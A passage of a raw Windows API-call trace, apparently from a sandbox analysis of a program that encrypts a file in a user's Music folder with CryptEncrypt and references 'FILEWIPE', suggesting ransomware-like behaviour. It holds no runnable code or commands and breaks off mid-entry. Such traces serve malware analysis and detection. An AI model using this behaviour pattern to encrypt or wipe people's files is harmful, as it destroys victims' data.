[0181.551] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.551] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.552] CharLowerBuffW (in: lpsz="byte[3153]", cchLength=0xa | out: lpsz="byte[3153]") returned 0xa [0181.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.552] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.552] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.552] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.552] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x902970*, pdwDataLen=0x87e820*=0xc44, dwBufLen=0xc50 | out: pbData=0x902970*, pdwDataLen=0x87e820*=0xc50) returned 1 [0181.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.552] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0181.552] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.552] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0181.552] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.552] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.553] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.553] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.553] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0181.553] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.553] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.553] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.553] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.553] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.553] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.555] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.555] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.555] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0181.555] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0181.555] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.555] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0181.555] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.556] CryptDestroyKey (hKey=0x90af98) returned 1 [0181.556] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0181.556] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0181.556] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0181.556] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0181.556] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0181.556] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0181.556] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0181.556] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0181.556] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.556] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0181.556] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0181.556] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0181.556] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0181.556] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0181.556] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.556] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0181.556] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.556] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0181.557] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.557] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.557] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.557] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.557] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0181.557] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.557] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.557] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0181.557] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0181.557] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0181.557] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.557] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0181.557] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.557] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.557] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0181.557] FreeLibrary (hLibModule=0x74f20000) returned 1 [0181.557] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.557] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.558] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.558] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.558] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.559] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.559] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0181.560] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.560] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.560] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xece70390, ftCreationTime.dwHighDateTime=0x1d5dda6, ftLastAccessTime.dwLowDateTime=0xe92c4280, ftLastAccessTime.dwHighDateTime=0x1d5ddc7, ftLastWriteTime.dwLowDateTime=0xe92c4280, ftLastWriteTime.dwHighDateTime=0x1d5ddc7, nFileSizeHigh=0x0, nFileSizeLow=0xc44, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="9zmv2.m4a", cAlternateFileName="")) returned 0x90af58 [0181.560] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0181.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0181.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0181.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0181.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.560] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0181.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0181.561] CharLowerBuffW (in: lpsz="byte[3140]", cchLength=0xa | out: lpsz="byte[3140]") returned 0xa [0181.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0181.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0181.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0181.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.562] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.562] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0181.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.563] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0181.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.563] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0181.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0181.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0181.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0181.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0181.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0181.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0181.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0181.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0181.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0181.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0181.564] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0181.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0181.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2628, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0181.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0181.565] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0181.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0181.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0181.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0181.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0181.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0181.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0181.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0181.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0181.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0181.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0181.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0181.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0181.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0181.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0181.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0181.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0181.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0181.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0181.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0181.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0181.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) 